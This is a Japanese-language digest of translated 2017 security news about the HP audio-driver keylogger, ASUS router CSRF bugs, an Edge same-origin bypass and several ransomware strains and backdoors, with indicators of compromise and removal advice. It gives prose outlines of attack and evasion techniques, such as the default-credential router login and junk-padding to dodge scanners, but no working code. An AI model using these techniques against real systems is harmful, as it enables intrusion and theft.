    * If you need our assistance, send a message by clicking on the decryptor window.

    暗号化されたファイルの拡張子
    .WCRY
    .WNCRY


    ヒューレットパッカード(HP)のラップトップのオーディオドライバにキーロガーが発見された
    BleepingComputer : News>Security (2017/05/11)
     HPのラップトップの一部にインストールされているオーディオドライバが、キーロガー(ユーザのキーストロークを全て記録し、その情報をローカル ファイルに保存し、何処を調べればいいのか分かっている誰もに、あるいは、サードパーティのソフトウェアや、マルウェアに、アクセスを可能にする)と言い表すのが最も適切な機能を含んでいた。
     スイスのサイバーセキュリティ企業modzeroは、4月28日に、このキーロガーを発見し、その発見を本日公開した。

    このキーロガーはプレインストールされているオーディオドライバ中に発見された

     研究者によると、このキーロガー機能は、Conexant HDオーディオドライバ パッケージのバージョン1.0.0.46及びそれ以前の中に発見される。
     これは、HPラップトップにプレインストールされているオーディオドライバである。このオーディオドライバのファイルの一つが、MicTray64.exe (C:\windows\system32\mictray64.exe)である。
     このファイルは、ユーザが自身のコンピュータにログインする度にScheduled Taskを介して起動するように登録されている。modzeroの研究者によると、このファイルは、「マイクロフォン、ミュート/ミュート解除、キー/ホットキーのような機能をキャプチャしたり相互作用したりするためにユーザによって実行された全てのキーストロークを監視している」。
     多くの他のアプリケーションが、この方法で動作しているので、この挙動は、単独では問題ないものである。この問題は、このファイルがローカル ファイル(C:\users\public\MicTray.log)に全てのキーストロークを記述することにある。

    オーディオドライバはローカルAPIを介してリアルタイムにキーストロークを露わにする

     このファイルが存在していない、あるいは、このファイルのパスを含むレジストリキーが存在していなかったり、損壊している場合、このオーディオドライバは、全てのキーストロークをローカルAPI(OutputDebugStringと名付けられているAPI)に渡す。
     この危険は、コンピュータにインストールされた悪意あるソフトウェアが、もしくは、そのコンピュータに物理的なアクセスを持つ人が、抽出し、このファイルをコピーし、今迄に使用されたキーストロークのデータから、パスワード、チャットのログ、訪問したURL、ソースコード、あらゆる他の機密データを抽出し、それにアクセスできることにある。
     更に、OutputDebugString APIは、マルウェアが、通常アンチウィルス ソフトウェアの監視下にある本来のWindows機能を使用することなく、リアルタイムにキーストロークを記録するための隠されたチャンネルを提供している。

    キーロガー機能が確認されたHPラップトップ

     modzeroの研究者は、Conexant HDオーディオドライバ パッケージが、HPの28のモデルにプレインストールされていたと発言している。このドライバを使用している他のハードウェアは、影響を受けることはないかもしれないが、調査した者は、この問題が他のコンピュータメーカーに影響を与えることを公式には確認していない。

      HP EliteBook 820 G3 Notebook PC
      HP EliteBook 828 G3 Notebook PC
      HP EliteBook 840 G3 Notebook PC
      HP EliteBook 848 G3 Notebook PC
      HP EliteBook 850 G3 Notebook PC
      HP ProBook 640 G2 Notebook PC
      HP ProBook 650 G2 Notebook PC
      HP ProBook 645 G2 Notebook PC
      HP ProBook 655 G2 Notebook PC
      HP ProBook 450 G3 Notebook PC
      HP ProBook 430 G3 Notebook PC
      HP ProBook 440 G3 Notebook PC
      HP ProBook 446 G3 Notebook PC
      HP ProBook 470 G3 Notebook PC
      HP ProBook 455 G3 Notebook PC
      HP EliteBook 725 G3 Notebook PC
      HP EliteBook 745 G3 Notebook PC
      HP EliteBook 755 G3 Notebook PC
      HP EliteBook 1030 G1 Notebook PC
      HP ZBook 15u G3 Mobile Workstation
      HP Elite x2 1012 G1 Tablet
      HP Elite x2 1012 G1 with Travel Keyboard
      HP Elite x2 1012 G1 Advanced Keyboard
      HP EliteBook Folio 1040 G3 Notebook PC
      HP ZBook 17 G3 Mobile Workstation
      HP ZBook 15 G3 Mobile Workstation
      HP ZBook Studio G3 Mobile Workstation
      HP EliteBook Folio G1 Notebook PC

     このConexant HDオーディオドライバ パッケージは、以下のオペレーティングシステム用のバージョンがある。

      Microsoft Windows 10 32-Bit
      Microsoft Windows 10 64-Bit
      Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
      Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
      Microsoft Windows 7 Enterprise 32 Edition
      Microsoft Windows 7 Enterprise 64 Edition
      Microsoft Windows 7 Home Basic 32 Edition
      Microsoft Windows 7 Home Basic 64 Edition
      Microsoft Windows 7 Home Premium 32 Edition
      Microsoft Windows 7 Home Premium 64 Edition
      Microsoft Windows 7 Professional 32 Edition
      Microsoft Windows 7 Professional 64 Edition
      Microsoft Windows 7 Starter 32 Edition
      Microsoft Windows 7 Ultimate 32 Edition
      Microsoft Windows 7 Ultimate 64 Edition
      Microsoft Windows Embedded Standard 7 32
      Microsoft Windows Embedded Standard 7E 32-Bit

    HPは、この記事を公開する時点でBleeping Computerからのコメントの要求に対して応答していない。

    HP MicTray64 Keyloggerをチェックし削除する方法

     modzeroによると、以下のステップに従うことで、HP MicTray64.exeキーロガーをチェックし削除することができるとしている。

      1. Task Manager(タスクマネージャ)を開き、MicTray64.exeと呼ばれるプロセスが実行中であるかを確認する。このプロセスが存在している場合には、終了させる。
      2. c:\Windows\System32\MicTray64.exe に移動し、このファイルをデスクトップに移動させる。
      3. C:\Users\Public\MicTray.log が存在しているか否かチェックする。存在している場合には、このファイルを同様にデスクトップに移動する。
      4. ここで、このキーロガーが削除され、ログファイルが隔離されたので、何がログされているのか調べなさい。
      5. デスクトップ上のMicTray.logファイルを開き、内容を検証しなさい。ログイン名、パスワード、銀行情報、あらゆる他の機密ログイン情報がログされていることに気がついたなら、関連するアカウントのパスワードを変更しなければならない。

     このステップに従ったなら、このキーロガーは最早アクティブにならないし、再起動で起動することもなくなる。


    ASUS RTワイアレスルータ所有者は、Webハイジャックのバグにパッチをあてなさい
    The Register : Security (2017/05/11)
     ASUS RTワイアレスルータが、30のデバイスに影響を与える貧弱なCross-Site Request Forgery(CSRF、クロスサイト リクエスト フォージェリ。【訳注】 別のサイトに用意したコンテンツ上の罠のリンクを踏ませること等をきっかけとして、インターネットショッピングの最終決済や退会等Webアプリケーションの重要な処理を呼び出すようユーザを誘導する攻撃(情報処理推進機構より))プロテクションにより、SOHOpelessリストに仲間入りした。
     CVE-2017-5891とラベルされたこの設計上のポカは、バージョン 3.0.0.4.380.7378 より古いファームウェアを使用している RT-AC と RT-N 製品系列に存在している。
     CSRFプロテクションの欠落は、ユーザがDefault認証(admin:admin)のままであったり、攻撃者が管理パスワードを認識していた場合に、犠牲者が悪意あるWebページを訪問した時、このWebページは、ルータにログインすることができる。この問題を発見したNightwatch Cybersecurityは、今週、この問題は些末なこと(「'login_authorization'フォーム ポストとしてBase-64でエンコードされたユーザ名とパスワードをブラウザの'/login.cgi' URLに送信している」)であると説明していた
     ログインが成功すると、例えば、攻撃者はルータの設定変更や、DNSの乗っ取りができることを意味しているが、NIghtwatchは、「我々は、一貫してこの問題を悪用することができなかった」と認めている。Nightwatchはまた、二つのJSONPバグ(ネットワークマップやルータの詳細のような極秘の可能性のある情報を露わにすることができる)にも注目している。
     ASUSは、このCSRF問題を5月のファームウェア アップデートで解決したが、Nightwatchの非CSRF問題の一つ(CVE 2017-5892。【訳注】 バージョン3.0.0.4.380.7378より古いファームウェアを搭載したASUS RT-AC* と RT-N* デバイスは、ネットワークマップのようなJSONP情報開示を可能にするバグ(Common Vulnerabilities and ExposuresのDescriptionの和訳))は、修正を必要とするほどの深刻さはないと考えているようである。また、このアップデートされたファームウェアは、以下を修正している。

      ・ CVE-2017-6547: このルータのHTTPデーモン中のクロスサイト スクリプティングのバグ
      ・ CVE-2017-6549: HTTPデーモン中のセッションハイジャックの脆弱性
      ・ CVE-2017-6548: このルータのネットワークコマンド中のリモートコード実行バッファ オーバーフロー

     未だパッチしていないのであれば、パッチしなさい。

    Update BleepingComputerが先程UPした記事に脆弱性のある型番とダウンロードサイトへのリンクが記載されていましたので、追記しておきます。

    ファームウェア ダウンロードは、コチラから。

    脆弱性のあるルータの型番は以下。

      RT-AC51U
      RT-AC52U B1
      RT-AC53
      RT-AC53U
      RT-AC55U
      RT-AC56R
      RT-AC56S
      RT-AC56U
      RT-AC66U
      RT-AC68U
      RT-AC68UF
      RT-AC66R
      RT-AC66U
      RT-AC66W
      RT-AC68W
      RT-AC68P
      RT-AC68R
      RT-AC68U
      RT-AC87R
      RT-AC87U
      RT-AC88U
      RT-AC1200
      RT-AC1750
      RT-AC1900P
      RT-AC3100
      RT-AC3200
      RT-AC5300
      RT-N11P
      RT-N12 (D1 versionのみ)
      RT-N12+
      RT-N12E
      RT-N16
      RT-N18U
      RT-N56U
      RT-N66R
      RT-N66U (B1 versionのみ)
      RT-N66W
      RT-N300
      RT-N600
      RT-4G-AC55U (パッチは利用可能になっていない)


    ニュース ブリーフ: 身代金要求型マルウェアBitKangorooは、支払いをしない場合には、ファイルを削除する
    BleepingComputer : News>Security (2017/05/08)
     私は、新たな身代金要求型マルウェアがリリースされた時に簡潔な記事を投稿する新しいことに挑戦中である。これら身代金要求型マルウェア感染の多くは、詳細な記事を必要とするものではないが、我々が身代金要求型マルウェアを発見した時、その新しいテクニックや変種に関して早急に公表することは重要なことだと思っている。
     身代金要求型マルウェアに関する最初の簡潔な記事として、私が本日発見したBitKangorooと呼ばれる新しい開発下の身代金要求型マルウェアに着目する。この特別な身代金要求型マルウェアは、犠牲者が素早く支払いをしなければ、犠牲者のファイルを削除することを意図する本当の卑劣漢によって開発されている。
     手短に言うと、この身代金要求型マルウェアは、AES-256暗号化を使用して犠牲者のファイルを暗号化し、暗号化されたファイルに .bitkangoroo 拡張子を追加する。次に、この身代金要求型マルウェアが暗号化されたファイルの一つを削除する猶予期間である60分のカウントダウンを表示する。一つのファイルが削除されると、このタイマーは60分にリセットされる。もっとも重要なことは、この身代金要求型マルウェアは、Michael GillespieBitKangarooDecrypterを使用して無料で復号することができる。
     以下にBitKangorooのロックスクリーンを示す。


    BitKangoroo身代金請求画面(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアは、現在開発下にあるので、デスクトップ上のファイルしか暗号化しない。犠牲者が間違った復号キーを入力すると、暗号化されたファイルの全てを削除する非作動コードを含んでもいる。あなたが上図の Decrypt my files ボタンをクリックした時に表示される警告メッセージは以下である。


    ファイル削除警告(復号キーは間違いないか? キーを挿入できるのは一回だけだ。間違っていれば、全てのファイルは削除される)

     以下に暗号化したファイルの全てを削除するコードを示す。


    ファイル削除用のコード

     最後に、この身代金要求型マルウェアの画面は、クリックすると、この身代金要求型マルウェアの開発者にeMailするためのフォームを開くラベルを含んでいる(【訳注】 一番上の図の一番下、Click me to write the email!)。現在使用されているeMailは、bitkangoroo@mailinator.com であり、以下に、このeMailの例を示す。


    身代金要求型マルウェア開発者へのeMail(画像をクリックすると拡大表示されます。Warning以下に注意してください。直上の文字列を削除するな、とあります。)

     この身代金要求型マルウェアの状況が変化したら、私はこの記事をアップデートする。
     あなたが、この簡潔な記事を有用であると判断したなら、私に知らせてほしい、それで、私はこのような記事を継続するか否か決定することができる。

    IOCS

    Hashes

    SHA256: 810f9bff502d2c9a98164201590eed5ff2cc96cd42a5d6008af93ecfc8bf9c13

    関連ファイル

    %UserProfile%\AppData\Roaming\IEAgent.exe

    関連eMail

    bitkangoroo@mailinator.com


    Googleの研究者が、Windows中にワームの侵入を可能にする「あまりにも酷い」脆弱性を発見した
    BleepingComputer : News>Security (2017/05/08)
    Update: (米国時間)昨晩遅く、Microsoftは、この「あまりにも酷いバグ」を修正する緊急のパッチをリリースしています。
     こちらのアドバイザリを参照して、適切に対処してください。

     Googleのセキュリティ専門家がWindows OS中に深刻なリモートコード実行(RCE)のバグを発見した。このバグは、「あまりにも酷い」ものとして説明されている。
     この二人の専門家は、Project Zero(サードパーティのソフトウェア製品中の0-Dayの脆弱性を発見し、パッチの手助けをするGoogleイニシアティブ)で活動しているNatalie SilvanovichとTavis Ormandyである。
     この二人は、この脆弱性の詳細をリリースしていないが、この問題に関連する幾許かの不可解なツイートを投稿している。
     「@natashenkaと私は、最近のメモリ中での最悪のWindowsリモートコード実行を発見したと、私は思っている」そして、「これは『あまりにも酷い』ものである。途中報告」と、土曜日(5月6日)にOrmandyは発言している。
     Twitterのインフォセック コミュニティによる追求で、Ormandyは、詳細を明らかにしている。

      - 攻撃者と犠牲者は、必ずしも同一のLANに存在している必要はない。
      - 攻撃は、DefaultのWindowsインストールで動作する。これは、犠牲者が脆弱性となる特別なソフトウェアを彼等のシステムにインストールする必要がないことを意味している。
      - 攻撃は、ワーム(自己増殖する)の侵入を可能にする

     このツイートは、2017年5月の定例パッチ(明日、5月9日に予定されている。【訳注】 日本は5月10日(水))の数日前に出現した。この研究者達は、この脆弱性は今月パッチされるかもしれないと仄めかし、そうなれば、レポートが来るだろうと、そして、彼等が彼等の発見を自由に公開するだろうと、発言している。
     過去2年間、Ormandyは世の中で最も熟達したバグハンターの一人であり、CloudFlare, LastPass, Bromium's micro-virtualization technologyのような製品中の0−Dayや未パッチの脆弱性、そしてKaspersky, ESET, FireEye, Malwarebytes, AVG, Avast, Symantec, Trend Micro, Comodoのような複数のアンチウィルス エンジン中の0−Dayや未パッチの脆弱性を発見している。


    マルウェアの制作者は検出回避を願ってジャンク データでバックドア トロイを膨らましている
    BleepingComputer : News>Security (2017/05/01)
     マルウェアのプログラマは、一部のアンチウィルスによる検出回避を願って、あるいは、情報セキュリティの専門家の調査を遅延させるために、彼の悪意あるペイロードに数メガバイトのジャンク データを挿入している。
     このマルウェアのプログラマは、"123"としてのみ知られており、彼が最初にXXMMマルウェアを配備して注目された2015年以来、積極的に活動している。彼の行為は、標的型攻撃に分類される。そして、機密データを密かに抽出する目的で日本企業のコンピュータへの感染に取り組んでいる犯罪者である。

    123マルウェア プログラマは三つのマルウェアファミリーの背後にいる

     レポートによると、プログラマ123は、少なくとも三つのマルウェアファミリー(夫々、XXMM, ShadowWali, Wali)を陰に存在している。
     セキュリティ企業は、2015年のXXMMマルウェアによる123の最初の攻撃に気付いていたが、彼等は、これを非常に効果的ではあるが洗練されていないバックドアであると見做していた。
     セキュリティ企業は、同じプログラマによって作成された二つの新しいマルウェアファミリーを発掘した後、この一ヶ月に渡って、123の挙動に対する関心を再び唆られることになった。
     セキュリティ企業が発見した一つ目は、Waliと名付けられた新しいバックドア トロイであった。これは、2016年と2017年に於けるライブ攻撃で使用されていたことが確認されている。
     Kasperskyの最初のWailレポートの2週間後、Cybereasonのセキュリティ研究者が別のバックドアを発掘した。これは、Wailと多くの機能が共有されているためにShadowWailと名付けられた。

    ShadowWailは、Wailの早期のバージョンに大変類似している

     研究者は、2015年から、Waliによる攻撃の直前である2016年の半ばにかけて、ShadowWaliで日本企業が攻撃されていたことを明らかにした。
     二つの間に大きな相違がある場合でも、専門家は、Waliが32-bitと64-bitの両方で実行される(明らかに最初のものからの進化)が、ShadowWaliは32-bitバージョンしかサポートしていないという事実によって裏付けられるとする説で、ShadowWaliがWailの早期バージョンであると確信している。
     更に、それらの手口は殆ど同じである。攻撃は、ユーザがセキュリティ侵害されているWebサイトから、このマルウェアをダウンロードした後に開始する。最初のペイロードが実行されると、一連のチェックが始まる。これに合格すると、最終的にShadowWali / Waliバックドアをダウンロードすることになる。

    ShadowWailやWaliはジャンク データで膨らまされている

     ShadowWailとWaliは共に、内部に大きなファイル(50から200MBの範囲)をパッキングしている。ShadowWailとWaliにパッキングされているデータの殆どは、なんの目的もないジャンク データである。殆どのマルウェアは通常非常に小さい(僅か数キロバイトで、メガバイト レベルのものは非常に稀)ので、これは奇妙なことである。
     セキュリティ専門家によると、123は、大きなファイルをマルウェア中にパッキングすることによって、セキュリティ製品が、正当なアプリケーションと考えたり、あるいは、パフォーマンスの理由から、絶対にこのファイルをスキャンしないという誤解を持っていると、彼等は確信している。
     研究者は、123がShadowWaliとWaliペイロードの周囲にジャンク データのロードをパッキングしている別の理由として、彼がセキュリティ企業の調査を遅延しようとしているとする説を提示している。この理由は、YARA(マルウェアを見つけ出すために使用されるセキュリティ情報専門家によって使用される特別なフィルター)ルールが、大抵の場合大きなファイルより、むしろ小さなファイルを見つけるように設定されていることにある。

    ShadowWail/Waliはパスワードをダンプするプログラムをダウンロードするために使用されている

     感染したコンピュータに、ShadowWaliもしくはWaliがインストールされると、このマルウェアは、それ自体を他のプロセスに挿入する。殆どの感染では、選択されるプロセスは、Internet Explorer(iexplorer.exe)であるが、このマルウェアは、Windows Explore(explorer.exe)や、Local Security Authority Subsystem Service(lsass.exe)に挿入されていたケースがあった。
     その後、次のステップは、現在のPCから証明書をダンプするための幾つかのツールをダウンロードし、ローカルネットワークを探検することである。ローカルユーザ証明書を取得するために、ShadowWali/Waliは、パスワード ダンピング ユーティリティMimkatzのモジュールをダウンロードしインストールする。
     次に、123は、企業ネットワークの内部を横断的に移動するために、この証明書を使用し、彼が盗むことのできる機密情報を検索する。このデータで、123が実行しようとしていることは、現時点で分かっていない。

    研究者はShadowWaliビルダーのベールを剥いだ

     Cybereasonの専門家の更なる調査は、このマルウェアをアッセンブルするために使用されたShadowWaliビルダーと思われるユーティリティを明らかにした。


    xxmm2_builder インターフェース


    xxmm2_builder - 最初のボタンのオプション


    xxmm2_builder - 二番目のボタンのオプション


    xxmm2_builder - 三番目のボタンのオプション

     "xxmm2_build"と名付けられている場合でも、このビルダーの出力は、XXMMバックドアよりもむしろ、ShadowWaliのサンプルにより一致していると、CybereasonのAssaf Dahanは発言している。
     更に、サンプルがユーザモードでのみ動作したので、このビルダー インターフェース中の用語"rootkit"の用法は、その出力と一致していない。
     このビルダーはまた、このマルウェアのC&Cサーバ コミュニケーション(JPEG画像内部の第二段階のマルウェアダウンロードを隠蔽するために電子迷彩技術に依存している)と、データを感染したホストと交換するためのPHPトンネルに対する研究者の洞察を可能にしていた。
     専門家によると、123がアジアに在住していることを指摘する証拠もまた存在しているが、正確で明瞭な特性は、現在の所作成できていない。


    SamusunスマートTVは、Wi-Fiダイレクト機能を介してハックされる
    BleepingComputer : News>Security (2017/04/26)
     Nesesoのセキュリティ研究者は、彼等がSamusunスマートTV中に発見し、Samusunが修正を拒否した脆弱性に関して警告を発している。
     このセキュリティ フローは、Wi-Fiダイレクト(ワイアレス・アクセスポイントを要求することなく、デバイスの相互接続を有効にするWi-Fi規格)に影響する。
     Samusunは、彼等のTVの所有者が、ローカル・アクセスポイントを介することなく、電話、ラップトップやタブレットを直接TVに接続することを可能にするために、彼等のスマートTVにWi-Fiダイレクトを使用している。

    SamusunスマートTVは認証にMACアドレスを使用している

     Nesesoの研究者は、Samusunが、ユーザ認証にMACアドレスを使用しているだけなので、この規格の実装は失敗していると主張している。他のベンダは、プッシュボタンやPINに基づいたより確固たる認証システムを使用している。
     誰もが、MACアドレスを傍受したり成り済ましたりすることができるので、この脆弱性が開いていると、TVのWi-Fiダイレクトの受信範囲にいる全ての者が、このユーザのTVをハックできることになる。
     「接続すると、この攻撃者は、このTVが提供する全てのサービスへのアクセス(リモートコントロール・サービスやDLNAスクリーン・ミラーリング)を持つことになる」と、Nesesoの研究者は、彼等のレポートに記述している。

    このスマートTVは他のハッキングのためのエントリーポイントとして使用可能

     更に、彼等は、攻撃者がユーザや企業のプライベートネットワークへのエントリーポイントとして、このTVへのアクセスを使用できることに異議を唱えている。攻撃者は、このTVが接続されているWi-Fiネットワーク用のログイン認証をダンプすることができ、そして、他のデバイスに移動することができる。
     殆どの企業が事務所、従業員休憩室、顧客待合室、役員室にスマートTVを設置しているので、この危険性は、企業にとっては直ぐに感じられるものである。
     最悪の事態は、SamusunスマートTVが、電源を入れる度にDefaultでWi-Fiダイレクトを有効にしていることにある。ホワイトリストに記述されているデバイスがWi-Fiダイレクトを介してこのTVに接続されると、ユーザはスクリーン上で通知されるが、このような警告は、TVの所有者に誤解されたり、誰も画面に注意を払っていなければ、完全に無視される可能性がある。

    Samusunは「セキュリティ上の脅威」ではないと発言している

     3月中旬、NesesoにコンタクトされたSamusunは、この問題を「セキュリティ上の脅威」と見なしていないとNesesoに告げ、この機能はセキュリティ上のリスクと見なしていない、そして、ファームウェアのアップデートを提供することはないと回答していた。
     研究者は、Samsung UN32J5500 ファームウェアのバージョン 1480 でこの攻撃をテストしたが、他のバージョンも似たようなものであると発言している。SamusunスマートTVの電源を入れる度に、この機能をOFFにする以外、Wi-Fiダイレクトを介しての攻撃を防御するための解決策は現在存在していない。
     今月初めのSecurity Analyst Summit 2017で、セキュリティ エキスパートAmihai Neidermanは、Tizen中に40の0−Dayの脆弱性を公開した。このTizenは、SamusunスマートTVで稼働しているオペレーティングシステムである。このフローは、彼等がレポートした時点で、全て未パッチのままである。


    Microsoft EdgeにCookieとパスワード盗難の脆弱性
    BleepingComputer : News>Security (2017/04/24)
     Microsoft Edge中の脆弱性が悪用されると、攻撃者は、ユーザの様々なオンラインアカウント用のパスワードとCookieファイルを取得することが可能になる。
     この脆弱性は、EdgeやInternet Explorerのフローを長期に渡って明るみに出してきたセキュリティ エキスパートManuel Caballeroによる研究に従って明るみに出た。
     Caballeroの最新の研究は、同一生成元ポリシー(WebサイトAがWebサイトBからロードされたスクリプトをロードし実行することを妨げるセキュリティ機能)のバイパスである。

    この脆弱性は攻撃者にEdgeのSOP(同一生成元ポリシー)防御をバイパスすることを可能にしている

     今日、Caballeroが頭痛を誘発する技術記事で公開したこのフローは、攻撃者が、データURI、meta refreshタグ、about:blankのようなドメインレス ページと協力して悪意あるコードをロードし実行することを可能にするものである。
     悪用技術の様々なバリエーションにおいて、Caballeroは、犠牲者を悪意あるURLにアクセスするように欺くことによって注目を浴びているサイトでコードを実行できる方法を示した。
     三つの概念の証明のデモで、この研究者はBingホームページでコードを実行し、他のユーザの代理としてTweetし、TwitterのアカウントからパスワードとCookieファイルを盗んだ。
     この最新の攻撃は、最先端のブラウザの設計におけるセキュリティ フロー(ユーザをログアウトしたり、ログインページをロードしたり、ブラウザのパスワード自動補完機能によって自動的に挿入されるユーザ認証を盗む攻撃者の能力のような)を再露出させた。
     この全てが動作している方法をより適切に理解するために、Caballeroは、この攻撃ビデオをレコーディングしている。
     この脆弱性は現在未パッチである。概念の証明のデモのバージョンはオンラインにホストされている[1, 2, 3]が、我々は、人々がTwitterのCookieやパスワードをサイトにダンプされるのは恐怖であると推測する。
     このために、Caballeroはダウンロード用のデモを提供しているので、他の人はソースコードを調査し、彼等のパスワードやCookieが何処にもアップロードされていないことを確認することができる。

    悪意ある広告は攻撃を自動化することができる

     このセキュリティ研究者は、攻撃者が他のオンラインサービス(Facebook、Amazon等)のパスワードやCookieをダンプさせるようにカスタマイズすることができると発言している。このフローは、UXSS/SOPバイパスが、何方かといえば各ブラウザ固有であるために、Edgeだけが影響を受ける。
     更に、最先端の広告はブラウザにJavaScriptコードを配布する。攻撃者は、数千以上の犠牲者にこの悪意あるコードの配布を自動化するために、悪意ある広告キャンペーンを利用することができる。
     「攻撃者は人気のサイトの安直なバナーの内部に悪意あるビットを仕込んだ悪意ある広告を使用すると考えなさい。攻撃者がYahooのバナーの内部にホストされ、このユーザが彼女のTwitterアカウントにログインするとしたら、彼女は、対話的な行為を何ら行うこともなく専有されるだろう(原文のまま)」と、この研究者は説明している。

    Webrootアンチウィルスが発狂した! Windowsのシステムファイルを悪意あるものとして判定している
    BleepingComputer : News>Security (2017/04/25)
     Webrootアンチウィルスが昨日の午後遅く発狂した。Windowsのシステムファイルを悪意あるものとして判定したので、影響を受けたファイルの一部は隔離所に移動させられ、顧客のコンピュータを滅茶苦茶にし始めていた。
     アンチウィルス ソフトウェアは、Windowsシステムファイルを無視するように設計されている。これは、これらのファイルが、Windows OSの操作に極めて重要なもののためである。
     Webrootは、これらのファイルを、トロイ(W32.Trojan.Gen)として判別したが、これは最大の問題ではなかった。このアンチウィルスは、ファイルの移動を始めたので、コンピュータはエラーを表示したり、一部のコンピュータはクラッシュした。
     この会社は、彼等のアンチウィルスが、米国山岳部時間(MST)午後1時から午後3時(協定世界時 午後7時から午後9時、【訳注】 日本時間、翌日の午前4時から午前6時)の間、メチャメチャになったと発言している。この問題は、最終的に修正されたが、多くの顧客が、数百もしくは数千のファイルの隔離所への移動を押し付けられた。

    WebrootはFacebookへのトラフィックもブロックした

     殆ど同時に、Webrootアンチウィルスは、Facebookをフィッシングサイトとしてタグ打ちし、このソーシャルネットワークへのアクセスをブロックした。
     このアンチウィルスは、ユーザが彼等の不満を示すためにTwitterを使用し、この会社を激しく非難していたので、Twitterもブロックしなければならなかった。
     皮肉の頂点で、彼等の顧客広報は、Webrootの隔離所に閉じ込められたWindowsファイルの問題を持った顧客に、身代金要求型マルウェアに関するプレゼンテーションへのリンクで回答し始めた。

    現在、殆どの問題は修正された

     それであるにも拘わらず、この企業のフォーラムへの投稿によると、Webrootのテクニカル チームは素早く動き、昨晩遅くにFacebook問題を解決する修正をリリースした。
     この会社は、顧客がファイルの復元と、このアンチウィルスが同じWindowsファイルを W32.Trojan.Gen として再検出することを妨げるために従うことのできる一連の指示を提供している。
     これらの指示は、Home Editionのユーザのみに有用である。Webrootは、より複雑な修正を必要とする企業ユーザ用の解決策は、依然として作業中である。
     二ヶ月前、Webrootのアップデートは、彼等のクライアントの一部のコンピュータに問題を発生させクラッシュさせている。

     【訳注】 原文は、この後Twitterの引用が続きますが、公開された画像のみ紹介し、それ以外は省略します。


    PDF中に隠されていたWordドキュメントに身代金要求型マルウェアが隠れていた
    Sophos : NakedSecurity (2017/04/24)
     SophosLabsは、ロシアのマトリョーシカ人形のように、順番にPDFに入れ子にされていたWordドキュメント内部のマクロによって、身代金要求型マルウェアをダウンロードし実行する新たなスパム キャンペーンを発見した。今回の身代金要求型マルウェアは、 Lockyの変種であるように思われる。
     SophosLabsの研究者によると、殆どのアンチウィルスのフィルターは、ドキュメント中の疑わしいマクロを認識する術を知っているが、PDF内部に隠されたこのようなドキュメントは、このフィルターを上手く躱す術になりそうである。

    最新の戦術はどのようなものなのか?

     一般的なパターンに従うと、この最新の身代金要求型マルウェアは、PDF添付ファイルの付いたeMailスパムとして出現する。

    このPDFは、内部にドキュメントが付属しており、Acrobat Readerで開かれようとする。

     このドキュメントがMS Word中に開かれると、ソーシャル・エンジニアリング攻撃を通して編集を有効にするように要求してくる。

    これは、Crypto身代金要求型マルウェアをダウンロードし実行するVBAマクロを実行する

    何をすべきか?

     この種の攻撃からより適切に身を守るために人々が実行できることがある。

      ・ 定期的にバックアップし、最新のバックアップをオフサイト(【訳注】 PC本体やインターネットに接続していない場所)に保持しなさい: ファイルが突然消滅するのは身代金要求型マルウェア以外にも多くの方法がある(火事、洪水、ラップトップを落とした、誤って削除した)。バックアップを暗号化しなさい。これで、バックアップ デバイスが悪者の手に渡っても何の心配もする必要はない。
      ・ eMailを介して受け取ったドキュメント添付ファイル中のマクロを有効にするな: Microsoftは、数年前からセキュリティ基準として、慎重にDefaultでマクロの自動実行をOFFにしている。多くのマルウェア感染は、あなたを説得し、あなたがマクロをONに戻すことを当てにしているので、これを実行してはならない。
      ・ 頼みもしないのに送ってきた添付ファイルには注意を払う: 間違いなくあなたが望んでいるドキュメントであると分かるまで、そのドキュメントを開くべきではないが、開けてみなければ望んでいるドキュメントか否か分からないというジレンマを、犯罪者は当てにしている。疑わしきは、無視せよ。
      ・ サッサとパッチせよ、頻繁にパッチせよ: ドキュメント マクロを介して出現しないマルウェアは、しばしば、人気のあるアプリケーション(Office、ブラウザ、Flash等)のセキュリティ バグに依存している。速やかにパッチすればするほど、犯罪者が悪用するために残存するセキュリティ ホールは少なくなる。この攻撃に関しては、ユーザは、PDFとWordの最新のアップデートを適用したバージョンを使用していることを確実なものにしておきたい。
      ・ Sophos Intercept X(【訳注】 有料)を使用する: このプログラムは、認証されていないファイルの暗号化をブロックすることで身代金要求型マルウェアの動きを止める。

     Sophosは、このPDFを Troj/PDFDoc-C として、ペイロードを Troj/Locky-UP として検出する。

     役に立つと思われる他のリンク


    低価格のランサムウェア(身代金要求型マルウェア)サービスが発見された
    Kaspersky : ThreatPost (2017/04/18)
     Karmenと名付けられた新たなRansomware as a Service (RaaS、サービスとしてのランサムウェア。【訳注】 サービスとしてランサムウェアを販売することには利点があります。RaaSは、不正活動の出処である作成者が突き止められる可能性を軽減させます。ランサムウェアをサービスとして販売することによって、作成者には、発覚のリスクを増やさずにいくらかの利益を得るという旨味があるのです(Trend Microセキュリティ ブログより))が、Recorded Futureのセキュリティ研究者達によって発見された。
     Karmen RaaSの価格は $175 であり、購入者が身代金額を設定すること、犠牲者への支払い期間や、ターゲットと通信する複数の方法の提供を可能にしている。このコンソールはまた、加入者がクライアントの数と彼等が稼いだ金額を記録することを可能にするダッシュボードとして挙動する。
     Recorded Futureによると、「Karmen身代金要求型マルウェアは、独立型のマルウェアとして販売されており、一括前払いだけを要求している。そして、購入者が感染した犠牲者からの支払いの全額を取り分とすることを許している。」 この身代金要求型マルウェアは、簡易版と完全版の両方で販売されている。簡易版はSandbox同定機能を削除しているので、より小さなファイルサイズで提供されている。

    Recorded Futureは、このマルウェアは3月4日に、ロシア語を話せるDevBitoxもしくはDereck1と名乗るサイバー犯罪者によってアンダーグラウンド フォーラムで RaaSとして販売されていたと発言している。「さらなる調査で、ロシア語を話すサイバー犯罪者DevBitoxが、Karmenマルウェアの背後にいる販売者であることが判明した」と、Recorded Futureの研究者Diana GrangerとAndrei Barysevich(火曜日に公開された、この身代金要求型マルウェアに関するレポートの著者)は記述している。
    DevBitoxに関しては、このハッカーが、これまでに様々なハッキングサーヒスに関してクライアントを募集していたことが観察されているという事実を除いて、Dark Web上でも殆ど分かっていない。Karmen身代金要求型マルウェアは、このハッカーの最初の商用プロジェクトのようだと、研究者達は発言している。
     Karmenは、2015年8月にトルコ人のセキュリティ研究者Utku Senによって教育目的でリリースされたHidden Tearと呼ばれるオープンソース身代金要求型マルウェアと結びついている。このリリースはそれ以来、立て続けに派生物を呼び起こした。

     研究者によると、Karmen感染の最初のケースは、ドイツ及びアメリカ在住の犠牲者によって2016年12月に報告されている。Karmenは、AES-256暗号化を使用して感染したPCのファイルを暗号化する。
